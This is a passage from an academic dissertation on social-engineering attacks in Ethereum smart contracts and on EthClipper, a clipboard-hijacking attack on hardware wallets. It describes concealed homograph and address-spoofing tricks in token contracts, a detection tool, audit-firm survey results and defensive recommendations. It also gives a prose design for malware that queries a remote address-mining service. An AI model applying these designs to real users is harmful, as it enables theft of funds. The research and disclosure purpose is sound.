contracts that meet the following criteria: a) they represent a popular use case of a smart contract; b)
they have thousands of active users; c) they have high market capitalization (i.e., the users entrust
them their funds); d) the contracts implement one of the standard use cases from the OpenZeppelin
Contract library. Then, we slightly modify the source codes of these contracts to integrate the
social engineering attacks into them without altering any functionality or incorporating any unsafe
practices or known vulnerabilities. This way we demonstrate that popular trusted smart contracts
are capable of delivering the social engineering attacks.
    After integrating the attack patterns into the source codes of the five contracts, we deploy the
contracts on Ropsten testnet and validate their expected functionalities. Then, we simulate the
production deployment of the contracts, and demonstrate that some transactions that worked during
the testing will fail due to activation of the attack functionality (e.g., deployment of a contract at
EOA address in attack A2 ). For each case, we make sure that: a) the attacks remain dormant
during the test stage and activate only on a production deployment; b) the attacks visually conceal
themselves from the auditor; and c) each attack has a rational disguise (e.g., pretend to profit from
charging service fees). Table 2.2 summarizes the five smart contracts and attack patterns integrated
in them. The video demonstrations of all the five cases are available at https://nick-ivanov.github.
                                                   34


io/se-info/. The source code files of the entire smart contract set are available at https://github.com/
nick-ivanov/social-engineering-big5.
Production Deployment Simulation: Our manual analysis of the source codes of popular con-
tracts reveals that most of them use the OpenZeppelin Contracts templates with some custom addi-
tions. In our case study, we demonstrate the feasibility of an attack code integration into an existing
token without breaking the security patterns and functionality delivered by the OpenZeppelin Con-
tracts library. The manipulated token can be advertised as a new cryptocurrency with additional
features, such as special VIP privileges for early adopters. For ethics concerns, we perform both
testing and production deployment simulation using the Ropsten testnet, whose smart contract ex-
ecution is identical to the Mainnet, but does not involve real funds. To simulate a production
deployment of a malicious contract by an adversary, we deliberately configure the same contracts
with different constructor arguments (e.g., replace token symbol’s letter with its homograph twin),
or submit additional transactions (e.g., deploy a smart contract at a hard-coded EOA address). It
effectively simulates the activation of previously dormant malicious functionality in a production
deployment.
      Here, we provide a high-level overview of five attack patterns integration.
Integration of A4 pattern in Tether USD Stablecoin: Stablecoin is a fungible token pegged
to the market price of a fiat currency (e.g., U.S. dollar). Adopted mainly by crypto exchanges,
mainstream stablecoins have very high market capitalizations and daily transaction volumes. Tether
USD (USDT), the most popular stablecoin, is an ERC-20 smart contract deployed on Ethereum15 .
We integrate the pattern of attack A4 into the source code of USDT by adding a seemingly harmless
check of the token symbol before each transfer. We test the code by confirming that the transfer
routine’s functionality remains unchanged. After that, we simulate a production deployment of the
code with an invisible modification of the token symbol, which is passed through the constructor.
As a result, the smart contract traps user tokens due to the tampered token symbol.
Integration of A5 pattern in Binance Token: The Binance Token (BNB)16 is a popular ERC-
   15
      Deployed at 0xdAC17F958D2ee523a2206206994597C13D831ec7.
   16
      Deployed at 0xB8c77482e45F1F44dE1745F52C74426C631bDD52.
                                                   35


20 altcoin with a high market capitalization and daily transaction volume, collateralized by the
financial assets of Binance, a large crypto exchange. We integrate the pattern of attack A5 into
the source code of the BNB token by adding an innocently-looking logging routine, which saves
the transfer record in another smart contract. In the test, the code performs logging as expected.
However, in the final deployment, the owner replaces one letter in the logging function ICC header
with a homograph twin. The log call throws an exception ensuing the failure of fund transfer to
users.
Integration of A1 pattern in ChainLink Token: A blockchain oracle is a service that delivers
a reliable outside information into the context of a smart contract. Collateralized by its business
assets, ChainLink issues an ERC-20 token with the symbol LINK17 , in the source code of which we
integrate the pattern of attack A1 . In this token, we use a special user role, the VIP user, who can
transfer funds at any time, whilst the remaining users can only transfer funds after a pre-determined
deadline. The test run does not reveal any issues, but in the production deployment, the malicious
smart contract owner mines a similar public address with the same EIP-55 checksum as in the
legitimate VIP user address, and saves this address in the smart contract. As a result, the VIP user,
who does not recognize the address falsification, will fail to transfer funds from the smart contract.
Integration of A6 pattern in Bitfinex Token: The Bitfinex LEO token, also known as the UNUS
SED LEO18 , is backed by the assets of the Bitfinex crypto exchange. In this token, an auxiliary
helper smart contract is used by the attacker for purported protection against transfer flood (i.e., per-
forming too many small transfers by one user). This smart contract uses a homograph substitution
of the ICC header of the expected flood-checking function. However, because of the homograph
substitution, a wrong function in the auxiliary smart contract is called, which causes an unexpected
failure of fund transfer.
Hybrid Social Engineering Attack Pattern Integration in CryptoKitties: The ERC-721 stan-
dard is used for non-fungible (i.e., unique) Ethereum tokens, such as collectibles, games, deeds,
   17
      Deployed at 0x514910771af9ca656af840dff83e8264ecf986ca.
   18
      Deployed at 0x2af5d2ad76741191d15dfe7bf6ac92d4bd912ca3.
                                                   36


etc. The CryptoKitties collectible game is one of the most popular ERC-721 tokens19 . For this
contract, we use a combination of techniques from attacks A1 and A2 . Specifically, the A1 com-
ponent involves a manual change of the fee collector by the attacker. The A2 component deploys
a non-payable smart contract at an EOA address, resulting in transaction reversal. Akin to the
four previous attacks on ERC-20 tokens, this social engineering exploitation also does not reveal
itself during testing: only in the production environment, when the owner deploys the non-payable
contract, the malicious logic enables.
2.6: Evaluation and Analysis
In this section, we attempt to project the social engineering attacks onto all deployed open source
smart contracts and estimate the overall danger of the attacks.
2.6.1: Methodology
As demonstrated in Sections 2.3 and 2.4, the detection of social engineering attacks is impossible
in a fully-automated manner because human assessment is necessary for understanding semantics
of smart contracts. However, manual detection of social engineering attacks requires a laborious
effort, such as inspecting the source code with a hex viewer, generating ICC selectors, etc. To
address this dichotomy, we develop an automated tool that selects a potential subset of candidates
from a given set of smart contracts for further manual analysis. Using this hybrid approach, we
manage to filter out over 95.4% of all the candidates. Then, we manually inspect each of the
suspected smart contracts and classify them into three categories: non-exploitable, syntactically
matching, and semantically exploitable. Finally, we share our findings with security experts from
seven leading smart contract security firms and ask them to share their opinions about the attacks
in the form of an online survey.
   19
      Deployed at 0x06012c8cf97bead5deae237070f9587f8e7a266d.
                                                  37


2.6.2: Automated Detection
A specific feature of all social engineering attacks is that their deception mechanisms are located
only in the source code, and therefore undetectable in the bytecode. As a result, we consider the
source code of a smart contract as an input. Fig. 2.12 illustrates the operation of our automated
filter, which uses a double-layer detection, i.e., search for atomic signatures (attack markers) fol-
lowed by logic processing of these signatures to match specific attacks. First, we preprocess the
source codes by parsing multi-file contracts embedded in JSON objects, removing all non-Solidity
smart contracts, erasing all the comments, and discarding smart contracts that are duplicates of the
previously processed ones. Then, we feed the source codes into a set of signature detectors. Each
signature detector utilizes text search and regular expression matching to identify specific markers
in the source codes. For example, a fund transfer routine can be represented in the source code
by either of the three markers: a) the transfer routine; b) the send routine; or c) the call with
value procedure. These markers are then combined into a signature for detecting a fund transfer.
Based on the signatures, we generate social engineering attack detection rules in a conjunctive
normal form (CNF) by concatenating a sequence of signatures. We implement the smart contract
scanner using Python, ethereum.utils, and Web3.py, and we publish the source code of the tool at
https://github.com/nick-ivanov/esead.
      It is worth noting that we do not attempt to detect the proposed social engineering attacks using
traditional smart contract vulnerability scanners (e.g., Securify, Sereum, etc.), because these tools
by design assume a threat model in which a smart contract is the attack target. The only publicly
available tool that fits the threat model of the proposed attacks is HoneyBadger20 . However, Hon-
eyBadger is designed to detect Ethereum honeypots — the type of attack excluded from our study
due to its limited audience of targeted victims. Therefore, none of the existing tools is capable to
identify the proposed social engineering attacks.
   20
      https://github.com/christoftorres/HoneyBadger
                                                    38


Figure 2.12: Automated detection of potential social engineering attacks, in which atomic signa-
tures are combined to match an attack profile for each attack in the form of CNF.
2.6.3: Potentially Exploitable Smart Contracts
Attacks exploiting smart contract code vulnerabilities (e.g., reentrancy or integer overflow) can
be detected via automated analysis of bytecode, source code, or transaction history of a smart con-
tract. However, this information is insufficient to identify social engineering attacks with satisfying
certainty. For example, consider transaction 0xc215b9356db58ce05412439f49a842f8a3abe6c179
2ff8f2c3ee425c3501023c, through which the sender paid around $5 million in gas fees: the con-
text of this transaction cannot be known without a testimony from the sender. Our exhaustive effort
to find any existing reports of social engineering attacks in the wild have not yielded any results
beyond the cases of honeypot exploitations. Therefore, until the emergence of reports from victims,
we can only discuss the potential of the social engineering attacks in the real-world smart contracts.
      To shed light on the potential existence of social engineering attacks in Ethereum, we collect
all available open-source smart contracts from Etherscan21 , 85,656 unique smart contracts in total,
including 73,933 in Mainnet, 8,297 in Ropsten testnet, and 3,426 in Kovan testnet. Table 2.3 shows
the breakdown of the 3,855 detected candidates, which can potentially deliver social engineering
attacks. Then, we perform a manual analysis of all the 3,855 suspicious cases to remove 2,375 non-
exploitable smart contracts, and subdivide the remaining 1,480 contracts into 453 syntactically
matching (but not exploitable) and 1,027 semantically exploitable contracts. An example of a non-
exploitable contract22 would be the one with a suspicious transfer isolated from critical instructions
by a mutually-exclusive if-else branching. Next, we elaborate on how we identify syntactically
matching and semantically exploitable contracts, as well as their implications.
   21
      https://etherscan.io/
   22
      For example, 0xa62bf7c97c4270882a9278c6f9d684d30e242e03.
                                                   39


Syntactically Matching Contracts: A syntactically matching smart contract fits the profile of one
of the social engineering attacks (A1 ... A6 ), but does not exhibit a deception capability necessary for
fooling the victim. For example, smart contract 0xe5b288da8fb70cd 58ab240f71610576657308762
fits the A2 case because it has a hard-coded fee-collecting EOA address. However, the manual ex-
amination of the smart contract reveals that this address is 0xfeefeefeefee feefeefeefeefeefeefe
efeefeef. Obviously, it is extremely unlikely that someone owns an account that can deploy a
smart contract at this address.
      Another example of a syntactically matching smart contract is the smart contract called MyMil-
lions23 , in which a fee transfer is sharing the call stack of the same transaction with another transfer,
while the fee address is both pre-initialized and can be changed, which matches both A1 and A2
attacks. However, the manual analysis of this contract reveals that the double transfer occurs in the
the function buyFactory, which is an engagement function (i.e., the function that the client calls to
participate in the scheme of the smart contract). If this function fails due to the attack, the client
deposit will never happen, and therefore this attack will not bring any gain for the attacker. Since
semantics of smart contracts vary, only a human can definitely identify engagement and resolution
functions.
Semantically Exploitable Contracts: A semantically exploitable smart contract not only matches
the profile of one of the social engineering attacks, but it also has the deception capability. It indi-
cates that this type of contracts is actually exploitable. A deception capability is an introspective
measure characterized by a substantial chance for a contract user to misconstrue the logic of the
smart contract, leading to a potential execution of one of the social engineering attacks. The in-
trospective nature of deception capability requires a human to reason about deceptiveness, leading
us to manually analyze the source codes of all the 3,855 automatically selected suspected source
codes, taking around 140 person-hours in total.
      As an example of semantic exploitability, our analysis reveals 34 smart contracts where a com-
parison with an empty string literal precedes a critical operation, such as the one shown in Fig. 2.13.
   23
      Deployed at 0xbBbeCd6ee8D2972B4905634177C56ad73F226276.
                                                     40


One way such a contract can be used as a carrier of attack A4 is through the use of a zero-width space
(Unicode U+200B), which appears as an empty string in many popular text editors (e.g., VS Code).
Although none of the suspected 34 contracts have an actual zero-width space, a redeployment of
the same contract can be used to launch the social engineering attack A4 .
      Another interesting exploitable example of attack A4 can be found at 0xf5615138A7f2605e
382375fa33Ab368661e017ff. This smart contract implements a personal smart contract scheme,
which implies that each user of the scheme has an individual deployment of the same smart contract,
sometimes referred to as a “wallet”. The contract uses a homograph symbol in a hashmap key,
which leads to the inability to withdraw previously deposited funds. Although the contract has
an obvious deception capability, neither code nor transaction log could definitely determine the
contract’s maliciousness. In other words, the homograph substitution of the map key may indicate
a malice or a mere typo.
      Another peculiar example of a semantically exploitable Address Manipulation attack is the
game called JigsawGames224 . In this contract, the resolution function sellEggs contains a fee
transfer alongside with the user reward transfer, which allows the attacker to block the user from
getting the prize by making the fee address non-payable via attack A1 or A2 techniques. The
contract does not implement any self-destruction or deprecation functionality, posing a challenge
for the attacker who needs to acquire the funds trapped in the contract. Coincidentally, this smart
contract also charges a developer fee in the engagement function buyEggs. In this case, the attacker
can create a fake player, and make the fee address payable by calling buyEggs function multiple
times using the fake player until the contract balance is drained through multiple fee transfers. This
example shows that smart contract owners often have multiple indirect ways of stealing funds from
smart contracts.
2.6.4: Observations
While performing a manual analysis of 3,855 suspected smart contracts, we gathered some interest-
ing observations, which are relevant within a broader discussion about social engineering attacks
   24
      Deployed at 0x2C7Bc39B1B0C9Fdf200fd30C74C0a9a41C2C7047.
                                                  41


 1 if (! compareStr ( userGlobal .referrer , "")) {
 2    ...
 3    userRoundMapping [rid ][ referrerAddr ]. inviteAmount ++;
 4 }
Figure 2.13: Empty string comparison in a smart contract.               The contract is deployed at
0x61394198ee6cbe2d6ad603d52c10fba3237202ef.
in Ethereum.
Observation 1 [Multiple versions of the same code]: It is well-known that a vast majority of smart
contracts reuse secure patterns, modifiers, and abstract classes from the OpenZeppelin Contracts
library. However, despite the fact that we remove all duplicate smart contracts during the pre-
processing stage, our manual analysis of the suspected smart contracts reveals a significant number
of large contract clusters, in which a custom code is reused with slight modifications. Such clusters
of reused custom code patterns are also widely presented in the semantically exploitable set, which
demonstrates that code reuse is prevalent in smart contracts, leading to the dissemination of insecure
patterns.
Observation 2 [No evidence of testnet experimentation with social engineering attacks]: In
pursuit of early signs of experimentation with social engineering attack patterns, we supplement our
dataset with open-source contracts from two testnets — Ropsten and Kovan. Our initial hypothesis
was that the first experimental exploitations of social engineering attacks may prevail at testnets first.
However, compared to Mainnet, in which 937 out of 3,165 suspected contracts are semantically
exploitable (29.6%), in Ropsten this is 11.9%, and in Kovan it is 16.0%. Thus, the testnets exhibit
reduced probability of encountering semantically exploitable social engineering contracts.
2.6.5: Survey of Auditing Firms
To further evaluate the proposed attacks, we send surveys consisting of two questions shown in
Fig. 2.14 to the following seven smart contract firms (listed alphabetically): Audithor, CertiK,
CoinFabrik, ConsenSys, Dedaub, Trail of Bits, and one company that elected to be anonymous.
The responses were provided by actual smart contract developers and security auditors from each
                                                   42


                           Table 2.3: Analysis results of 85,656 smart contracts.
                                            Non-        Syntactically     Semantically
                             Attack
                                         exploitable      matching         exploitable
                               A1            561              230             636
                               A2            213              100             341
                               A3           1,515              0                0
                               A4             86              123              50
                               A5              0               0                0
                               A6              0               0                0
                             Total:         2,375             453            1,027
                             (a) Could this attack be dangerous to your customers?
                        (b) Do you think the attack can be discovered by human users?
Figure 2.14: Average survey results from seven smart contract auditing firms. The red vertical line
represents the average value of the six attacks.
of the firms (one anonymous participant from each company)25 . Fig. 2.14 represents the answers
from the experts regarding the six social engineering attacks. The vertical red lines represent the
averages of responses with respect to all the six attacks. The results of the survey demonstrate that
the experts agree that the social engineering attacks can cause damage to their customers. Also, the
experts believe that the social engineering attacks are unlikely to be discovered by a human user.
  25
     There was no identifiable private information collected from the anonymous participants; therefore, the study did
not require an IRB review.
                                                          43


2.7: Security Recommendations
In Section 5.6, we demonstrate that even if all the syntactic patterns in a smart contract correctly
match one of the social engineering attacks, only 1,027 contracts out of total 3,855 are actually
exploitable, which is less than 27%. Corroborating our finding, Zhou et al. [309] demonstrate that
the attempt to detect Ethereum honeypots by Torres et al. [270] in a fully-automated manner pro-
duces a large number of false negative and false positive results. Therefore, the defense against
social engineering attacks should involve human auditing. To account for this characteristic of
social engineering attacks, we develop a list of recommendations for people considering engage-
ment with a smart contract, including security auditors verifying safety of smart contracts on behalf
of their clients. These recommendations aim for effective identification and prevention of social
engineering attacks with minimal effort.
Recommendation 1 [Beware of address change]: To prevent A1 , smart contract users should
not engage in a contract which allows to change the address that is a transfer recipient within the
call stack of a critical operation. Our analysis finds many smart contracts with such patterns in the
wild, but none of them exhibit a malicious intent or have a suspicious history. However, it grants a
potential backdoor for the owner to block critical operations, e.g., fund withdrawals.
Recommendation 2 [Check EOAs for outgoing transactions]: To prevent A2 , smart contract
users should verify that all hard-coded EOAs have at least one outgoing transaction. If the EOA has
outgoing transactions (marked as “OUT” by Etherscan), it indicates that the smart contract owner
knows the private key of the EOA, and it entails that the owner does not know the private key of
the account that could deploy a smart contract at this address. In fact, the probability that someone
knows the private key of an EOA and the private key of the account for deploying a contract at the
same address equals to the probability of a 160-bit hash collision because each public address is a
Keccak256 hash of a public key trimmed to 160 bits.
Recommendation 3 [Avoid visual cognitive bias]: To prevent A1 , smart contract users should
never compare addresses visually; text editor search function should be used instead. In this work
                                                   44


we show that EIP-55 collision bruteforce attacks are easy to carry out. As a result, even slightly mod-
ified addresses with unknown associated private keys can be dangerous. Therefore, users should
treat all public addresses with suspicion.
Recommendation 4 [Avoid confirmation bias]: To prevent A3 , smart contract users should never
use accounts with all-lowercase EIP-55 checksums for smart contract testing. Most Ethereum
clients, such as Metamask, enforce EIP-55 checksums, so public addresses are always shown in
a mixed-capitalization form. Another way to verify an address is to paste it in the search field of
Etherscan, which also enforces EIP-55. If the address is all-lowercase, it might be a part of a social
engineering scheme, and thus the contract should undergo additional scrutiny.
Recommendation 5 [Do not trust string comparison]: To prevent A4 , smart contract users
should not engage in a smart contract that uses string comparison to determine a transfer or an-
other critical operation. If a text comparison involves two immutable values, e.g., constant and
string literal, it is essentially a tautology, and is indicative of a derelict smart contract. However,
one way to carry out attack A4 is to mimic a tautology, as is shown in Fig. 2.5. Either way, a critical
operation determined by a string comparison should be treated with caution.
Recommendation 6 [Verify ICC selectors]: To prevent A5 and A6 , smart contract users should
verify the arguments of call() and delegatecall() with a hex viewer. Smart contract users and
auditors cannot see selectors associated with functions and arguments of call()/delegatecall()
while examining the Solidity code, since these selectors are computed at the compile time. If the
parameters of call() or delegatecall() include a string literal, we recommend to compile both
the calling and the callable contracts with --asm or --ir options to verify that the selectors of
functions match. If the parameters are mutable variables, the contract cannot be treated as safe.
2.8: Chapter Summary
This work zeroes in on a largely overlooked class of social engineering attacks in Ethereum smart
contracts. These attacks exploit human cognitive biases as new attacking vectors. We identified
these biases and developed six zero-day social engineering attacks. By embedding most of these at-
                                                     45


tacks into existing popular tokens, we demonstrated that the attacks have the potential to victimize a
large group of normal users. Moreover, the attacks remain dormant during testing and only activate
after a production deployment. We worked with seven smart contract security firms and confirmed
that the attacks are indeed dangerous and evasive. Our analysis reveals 1,027 existing smart con-
tracts that can potentially carry out social engineering attacks. By open-sourcing our analysis tools
and benchmark datasets, we invite further research exploration of this emerging topic.
                                                   46


CHAPTER 3: ATTACKING HARDWARE
WALLETS26
3.1: Introduction
Hardware crypto wallets, also known as cold wallets, are air-gapped devices that produce public-
key signatures27 for transactions with cryptocurrencies and smart contracts. These devices have
some computing power, but they do not have any networking interfaces — to stay outside of the
cyberspace. Instead, they communicate with the client computer through a secure device-to-device
(D2D) channel (e.g., FIDO protocol over a USB serial bus). Hardware wallets are considered to
be the most secure solution for protecting crypto funds from stealing, even in the case when the
client computer is infected with malware. Fig. 3.1 shows four popular hardware wallets from three
leading brands available on the market: Trezor by SatoshiLabs s.r.o. [18], Ledger Nano X and
Ledger Nano S by Ledger SAS [17], and KeepKey by ShapeShift [19].
      Fig. 3.2 shows a transaction workflow with a hardware wallet. First, the client software prepares
a transaction message, and sends this message over to the hardware wallet via a non-networking
channel. Then, the user confirms the parameters of the transaction (such as transaction amount,
recipient address, and blockchain fee) shown on the display of the wallet. After that, the wallet
signs the transaction with a non-extractable private key, and sends the signature back to the client
software. Finally, the client software sends the signed transaction message to the blockchain, where
the transaction is executed. Unfortunately, the described chain of actions has a weak link: the
   26
      This chapter is based on previously published work by Nikolay Ivanov and Qiben Yan titled “Eth-
Clipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion” published
at the Proceedings of the 2021 IEEE Conference on Communications and Network Security (CNS). DOI:
10.1109/CNS53000.2021.9705033 [160]. © 2021 IEEE. Reprinted, with permission, from Nikolay Ivanov and Qiben
Yan, “EthClipper: A Clipboard Meddling Attack on Hardware Wallets with Address Verification Evasion” (paper and
IEEE titles are the same), October 2021.
   27
      All popular hardware crypto wallets are hierarchical deterministic (HD) wallets [16], which are capable of gener-
ating nearly infinite number of private keys (i.e., accounts) from a single secret seed.
                                                           47


Figure 3.1: Hardware wallets used in this research. ¶: Ledger Nano X ; ·: Trezor One; ¸: Keep
Key; ¹: Ledger Nano S.
attacker does not need to compromise the wallet to steal funds — it is sufficient to tamper with the
transaction data sent for signing by falsifying the address of the recipient of funds. A recent formal
security analysis by Khan et al. [172] formally proves that under normal cryptographic assumptions,
the user of a hardware wallet plays a crucial role in its security. One way to target the user of the
hardware crypto wallet is to substitute the transaction recipient address and covertly replace it in
the clipboard of the operating system.
    The clipboard substitution attack, or clipboard hijacking, has been known for years [45, 67].
This attack exploits the fact that wallet users often utilize clipboard for copying a recipient address
to the wallet’s client app. For example, the malware called Clipsa stole at least $36,000 worth of
Bitcoin in 2018 and 2019 [62]. By examining the client software provided by the three vendors of
the wallets shown in Fig. 3.1, we determined that they do not discourage the use of the clipboard
(e.g., by disabling the keyboard operations). In clipboard substitution attack the malware running
on the user computer detects the presence of a crypto address in the clipboard, and immediately
substitutes it with another address. This attack, however, has one major weakness: the user is
likely to notice the falsification of the address on the screen of the client software or on the mini-
screen of the hardware wallet. Hence, our research question: is it possible to devise a clipboard
                                                   48


Figure 3.2: General transaction workflow using a hardware wallet. ¶: The client software sends
the transaction data to the hardware wallet; ·: the user verifies the data and confirms the transaction
with the wallet; ¸: the wallet sends the transaction signature back to the client software; ¹: the
client software sends the signed transaction to the blockchain network.
substitution attack that dodges the revelation of the address substitution during the transaction
confirmation phase?
    The major insight of this work is to incorporate a social engineering component into a clip-
board substitution attack. Social engineering attack techniques exploit human cognitive bias —
an optimization mechanism of the human mind that makes conclusions based on expectation, prior
experience, probability assessment, pre-existing belief, or emotions [145]. One way of exploiting a
cognitive bias is through visual deception, which is actively used by attackers in email phishing via
mimicking a popular website [285]. Another facet of cognitive bias is confirmation bias, defined
as the rejection of evidence contradicting the originally established belief [169]. We discover that
both the visual deception and confirmation bias could be exploited by an attacker who tries to steal
funds from the hardware wallet. Specifically, this work is inspired by our observation that hard-
ware wallet users exhibit a strong confirmation bias about the correctness of the recipient address,
resulting in a behavioral pattern to verify only several leading (or trailing) digits of a transaction
address, or even skipping the verification whatsoever. The validity of this observation is confirmed
by previous research [50] and by manufacturers of the hardware wallets used in this research.
                                                  49


     In this work, we propose a new attack called EthClipper, which adds a social engineering com-
ponent to the existing clipboard substitution technique. In EthClipper, the attacker deploys a dis-
tributed system, called ClipperCloud, which is used to mine and store billions of Ethereum accounts.
When the malware detects an Ethereum address in the clipboard, it asks ClipperCloud to find among
the mined accounts the one that exhibits maximum visual similarity with the address in the clip-
board. As a result, the visual similarity between the address on the screen and the expected address
is likely to enact the victim’s confirmation bias, incurring the approval of the malicious transaction.
Although the Clipsa malware [242] also attempts to match some symbols in substituted address, it
uses a small address database and only targets two leading and two trailing symbols, which is very
easy to reveal visually. A small human-based study conducted by Almutairi and Al-Megren [50],
involving substitution of symbols in Bitcoin addresses using a KeepKey hardware wallet, confirms
that the rate of false approval of a modified address strongly correlates with the number of matching
symbols. Unsurprisingly, the attacks by Clipsa have been prevented at least 360,000 times [62].
Unlike Clipsa, EthClipper is highly optimized to enable practical substitution of up to 25% of the
symbols in the address for achieving maximum level of deception with a limited attacker’s budget,
while maintaining low latency, and maximized likelihood of having a replacement address readily
available.
     In summary, we deliver the following contributions:
     • We discover a new attack, called EthClipper, against hardware crypto wallets, which com-
        bines the features of clipboard substitution, cryptographic pre-computation, and social engi-
        neering to lure the victim into confirming a transaction with a tampered recipient address.
     • We introduce a low-latency application-specific distributed system, called ClipperCloud, that
        performs computation and storage needed for the EthClipper attack outside of the victim’s
        computer. This makes the attack a realistic one, which is easy to carry out.
     • We implement EthClipper malware, and test it using four popular hardware wallets from
        three manufacturers.
     • We implement the ClipperCloud system and test it on four server deployments. Our evalua-
                                                   50


Figure 3.3: Replacing 80% of address symbols with an ellipsis in MetaMask, one of the most
popular Ethereum wallets.
       tion shows that ClipperCloud exhibits a low query latency, and EthClipper attack adapts to
       a flexible range of setups and budgets.
     • For responsible disclosure, we have communicated the details of the attack to the manufac-
       turers of the wallets used in this research and received the confirmation from all of them that
       the attack is potentially dangerous.
3.2: EthClipper Attack Design and Analysis
In this section, we elaborate on the technical details of the EthClipper attack, and then describe the
workings of the EthClipper malware, followed by elaboration on the ClipperCloud system needed
for the attack.
3.2.1: Attack Overview
The manufacturers of popular hardware crypto wallets openly state that hardware wallets are the
best devices for storing crypto accounts. Yet the EthClipper attack bypasses the air-gapped protec-
tion of hardware wallets in order to steal money from the user’s Ethereum account by falsifying
the transaction recipient address with an address belonging to the attacker. The EthClipper attack
uses the clipboard hijacking technique to falsify the data sent to a hardware wallet without com-
promising the wallet itself. However, unlike previous attacks of this kind, EthClipper makes it
harder for the user to recognize a falsification. Fig. 3.4 shows a general workflow of the attack.
The attacker infects the victim’s computer with malware using one of a plethora of available tech-
                                                   51


niques [88,243]. The malware monitors the clipboard of the user account for appearance of a valid
public crypto address. Once the address is discovered in the clipboard, the malware immediately
contacts the pre-deployed distributed system, called ClipperCloud, which stores a database of sim-
ilar addresses that have been mined in advance (see Section 3.2.3 for details). After receiving the
matching visually similar address from ClipperCloud, the malware replaces the original address in
the clipboard with the forged one.
     Our observation suggests that users of hardware wallets tend to verify a few leading and trailing
symbols in the address. Moreover, many popular Ethereum wallets, such as MetaMask, indirectly
suggest the normality of skipping the internal symbols of the address by incorporating this feature
in the user interface (see Fig. 3.3). This observation is independently confirmed by three manu-
facturers of hardware wallets, and leads us to the design of the attack that substitutes the address
with matching d N2 e symbols in the prefix and b N2 c symbols in the suffix (see Fig. 3.6). Moreover,
our observation of Ethereum address checking by hardware wallet users reveals the habit of not
verifying more than 4 symbols in the prefix and 4 symbols in the suffix, suggesting that N = 8 is
likely to be sufficient amount of matching symbols in many cases. Since the attack is opportunis-
tic, there is no need for the attacker to succeed every time. However, the probability of success is
obviously growing with larger values of N . Furthermore, a large amount of funds involved in a
cryptocurrency transaction does not necessarily entail increased vigilance by the user. For example,
in 2016, an attack on an Ethereum smart contract, known as the DAO attack, incurred a damage
worth approximately $50 million due to a simple reentrancy vulnerability, which had been known
and well-researched for years prior to the attack [85] — despite high amounts of money at stake,
none of the investors in the infamous smart contract was able to notice the bug that was exploited
in the attack. Therefore, we do not exclude users of large transactions from the scope of potential
victims of EthClipper.
     When the user pastes the address in the hardware client application, he/she has to confirm the
parameters of the transaction on the screen of the wallet, which includes the recipient address, as
shown in Fig. 3.5. Since the address on the screen is visually similar to the expected one (i.e., the
                                                  52


two addresses have matching prefixes and suffixes), the victim might fail to notice the substitu-
tion. Our informal communications with several users of hardware wallets confirm that most of
them, when verifying the recipient address, examine only first and last several digits, or none at
all. Finally, the user pushes the confirmation button on the hardware wallet and sends the funds
to the address which corresponding private key is stored on ClipperCloud, and therefore known to
the attacker. EthClipper is optimized for the specifics of Ethereum, which allows for the attacker
to maximize the social engineering effect of the attack, which existing malware, such as Clipsa,
fails to achieve. However, it is possible to independently develop a similar malware and associated
distributed service optimized for other formats of addresses, such as Bitcoin.
3.2.2: EthClipper Malware
In this research, we design a malware that allows to bypass the air-gapped protection of a hardware
wallet through the EthClipper attack, which uses clipboard substitution as a carrier. EthClipper
malware is a program that persistently runs on the background, monitoring the clipboard of the
current user. An important feature of EthClipper malware is that it does not require any special
user privileges or hardware access. Moreover, it can be implemented as a cross-platform Python
or Node.js script. Once the malware detects an Ethereum address in the clipboard, it immediately
submits a UDP request to the ClipperCloud system, which replies with a substitute address, if one
is found. As soon as the substitute address is received, the malware injects it in the clipboard. Intu-
itively, it is very important for the malware to substitute the address very quickly, before the user
pastes the address to the wallet client application. The manufacturers of the hardware wallets used
in this study confirmed for us that currently there is no defense against EthClipper attack. Thus,
given the decentralized nature of the Ethereum blockchain, if the attack is deployed and subse-
quently revealed by one or multiple users, it would require an extensive publicity and substantial
amount of time to alert all potential victims of the attack. Next, we elaborate on the architecture of
ClipperCloud, which provides the storage model that allows to achieve a low response latency to
ensure the success of the attack.
                                                   53


Figure 3.4: Workflow of the EthClipper attack. ¶: The owner of the wallet copies a recipient
address to the clipboard from the source (e.g., website); ·: the EthClipper malware detects the
address in the clipboard; ¸: the malware connects to ClipperCloud to request an address that is
similar to the one in the clipboard; ¹: ClipperCloud replies with a similar address; º: EthClip-
per malware places the substitute address from ClipperCloud to the clipboard; »: the user of the
wallet pastes the address from the clipboard to the hardware wallet’s client software; ¼: the client
software sends the transaction data, which includes the replaced (fake) recipient address, to the
hardware wallet for signing; ½: the hardware wallet asks the user to confirm the parameters of the
transaction (by pushing a button on the wallet); ¾: the user of the hardware wallet, who is prone to
a confirmation bias, confirms the transaction without verifying all of the symbols of the recipient
address; ¿: the wallet signs the transaction using the air-gapped private key and sends the signature
to the wallet’s client software; : finally, the wallet client software sends the signed transaction to
the Ethereum blockchain, where the transaction is executed.
3.2.3: ClipperCloud
In order to make EthClipper practical for a real-world attacker, the abundant storage and heavy
computation needed for the attack must be outsourced to a distributed service. ClipperCloud is a
distributed system that has two main purposes: it mines malicious addresses for the attacker, and it
stores these addresses in a way that allows to query them very quickly. Next, we elaborate on the
architecture, computation, and storage model of ClipperCloud.
ClipperCloud Architecture: The EthClipper attack requires a heavy computation (for mining
                                                  54


                       (a) KeepKey                                     (b) Ledger Nano S
                  (c) Ledger Nano X                                      (d) Trezor One
    Figure 3.5: Ethereum cryptocurrency transaction confirmation in popular hardware wallets.
Figure 3.6: Address substitution pattern. The substituted address has the same number of matching
prefix and suffix symbols (or one more in the prefix, when the number of symbols is odd), i.e, d N2 e
in the prefix Ap , b N2 c in the suffix As , N total. When verifying the address, many users check only
a few symbols in the prefix, and sometimes a few symbols in the suffix.
similar addresses), as well as a large storage (for keeping the pre-mined addresses ready for the
malware and storing their corresponding private keys for the attacker to withdraw stolen money).
Moreover, to make ClipperCloud suitable for the EthClipper attack, the system must meet the
following four major requirements. First, regardless of the size of the database, the system must
respond to the malware requests very quickly, in order to replace the recipient address in the clip-
board before the user pastes it. Second, the computation and storage may need to be split between
multiple servers because a single server might not have sufficient resources required for the attack.
Third, the EthClipper malware is likely to have multiple instances, so the ClipperCloud system
                                                      55


must be able to serve them all. Fourth, the system must be flexible enough to support adding ad-
ditional computation and storage, as well being capable for easy reconfiguration after the address
database is fully mined. To satisfy these desiderata, we design ClipperCloud in a way that it can
split resources across multiple servers. To achieve that goal, each server performs communication
with malware, computation and storage in three parallel processes.
